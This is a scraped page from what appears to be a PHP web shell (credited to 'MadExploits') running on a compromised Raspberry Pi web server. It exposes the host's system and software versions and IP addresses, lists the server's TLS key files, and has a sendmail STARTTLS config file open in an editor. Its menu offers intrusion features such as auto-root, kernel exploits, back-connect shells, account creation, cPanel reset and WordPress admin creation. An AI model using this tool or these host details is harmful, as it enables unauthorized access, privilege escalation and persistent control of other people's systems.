Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
mail /
tls /
[ HOME SHELL ]
Name
Size
Permission
Action
no_prompt
7
B
-rw-r--r--
sendmail-client.cfg
1.16
KB
-rw-------
sendmail-client.crt
1.2
KB
-rw-r--r--
sendmail-client.csr
1005
B
-rw-------
sendmail-common.key
1.64
KB
-rw-r-----
sendmail-common.prm
1.61
KB
-rw-r-----
sendmail-server.cfg
1.16
KB
-rw-------
sendmail-server.crt
1.2
KB
-rw-r--r--
sendmail-server.csr
1005
B
-rw-------
starttls.m4
3.18
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : starttls.m4
divert(-1)dnl #################################################################### ##### This file is automagically generated -- edit at your own risk ##### ##### Copyright (c) 2002-2010 Richard Nelson. All Rights Reserved. ##### ##### file: /etc/mail/tls/starttls.m4 ##### STARTTLS Configuration for Debian Sendmail ##### generated via: (/usr/bin/perl v5>28.1) ##### /usr/share/sendmail/update_tlsm4 ##### version: 8.15.2 2024-06-17 19:31:44 cowboy ##### by: pi@lorencats.com ##### on: Thu Dec 4 10:39:30 2025 ##### in: / ##### input files: /etc/mail/databases ##### ##### Usage: ##### 1) To get *ANY* STARTTLS support for sendmail you ##### A) *MUST* Add this line to /etc/mail/sendmail.mc ##### `include(`/etc/mail/tls/starttls.m4')dnl' ##### B) *MAY* Add the same line to /etc/mail/submit.mc ##### to get MSP<->MTA authentication/encryption ##### 2) You may modify the marked portions of this file, those ##### deal with the cert/key filenames and TLS options. ##### If you need finer control of TLS options, use the access ##### database. ##### #################################################################### divert(0)dnl VERSIONID(`$Id: starttls.m4,v 8.15.2-14~deb10u3 2024-06-17 19:31:44 cowboy Exp $') dnl # dnl #--------------------------------------------------------------------- dnl # Bring in Autoconf results dnl #--------------------------------------------------------------------- ifdef(`sm_version', `dnl', `include(`/usr/share/sendmail/cf/debian/autoconf.m4')dnl') dnl # dnl # Check to see if inclusion is valid (version >= 8.11.0, tls enabled) ifelse(eval(sm_version_math >= 527104), `1', `dnl ifelse(sm_enable_tls, `yes', `dnl dnl # dnl # To support shared keyfiles, we need them to be group readable dnl # define(`confDONT_BLAME_SENDMAIL',dnl defn(`confDONT_BLAME_SENDMAIL')`,GroupReadableKeyFile')dnl dnl # dnl # ...Do not touch anything above this line... dnl # dnl # Set a more reasonable timeout on negotiation dnl # define(`confTO_STARTTLS', `2m')dnl # <= EDIT dnl # dnl # CA directory - CA certs should be herein define(`confCACERT_PATH', `/etc/ssl/certs')dnl # <= EDIT dnl # dnl # CA file (may be the same as client/server certificate) define(`confCACERT', `/etc/mail/tls/sendmail-server.crt')dnl # <= EDIT dnl # dnl # Certificate Revocation List define(`confCRL', `')dnl # <= EDIT dnl # CRL not found... do not issue warnings on it! undefine(`confCRL')dnl dnl # dnl # Server certificate/key (can be in the same file, and shared w/client) dnl # NOTE: The key must *NOT* be encrypted !!! define(`confSERVER_CERT', `/etc/mail/tls/sendmail-server.crt')dnl # <= EDIT define(`confSERVER_KEY', `/etc/mail/tls/sendmail-common.key')dnl # <= EDIT dnl # dnl # Client certificate/key (can be in the same file, and shared w/server) dnl # NOTE: The key must *NOT* be encrypted !!! define(`confCLIENT_CERT', `/etc/mail/tls/sendmail-client.crt')dnl # <= EDIT define(`confCLIENT_KEY', `/etc/mail/tls/sendmail-common.key')dnl # <= EDIT dnl # dnl # DH parameters define(`confDH_PARAMETERS', `/etc/mail/tls/sendmail-common.prm')dnl # <= EDIT dnl # dnl # Optional settings define(`confTLS_SRV_OPTIONS', `V')dnl # <= EDIT dnl # ')')dnl
Close